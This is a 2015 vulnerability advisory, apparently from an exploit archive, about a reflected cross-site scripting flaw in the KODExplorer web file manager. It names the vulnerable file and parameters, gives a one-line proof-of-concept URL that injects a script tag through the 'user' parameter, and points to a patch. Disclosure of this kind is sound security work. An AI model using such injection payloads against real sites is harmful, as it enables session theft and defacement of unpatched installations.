KODExplorer Web File Manager Cross Site Scripting

Posted on 30 December 2015
================================================================================
# KODExplorer web file manager - Cross Site Scripting
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================
# Vulnerable File : file.php
# Vulnerable Code : check line 55 on the template/file.php
# PoC :
http://localhost/index.php?share/file&user=admin"></script><script>alert('xss')</script>&sid=

Vulnerable Parameters : admin , sid

Patch released : Check my git https://github.com/xtnr3v0lt/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
TOP
Malware :

Last 20
Exploits :

Last 20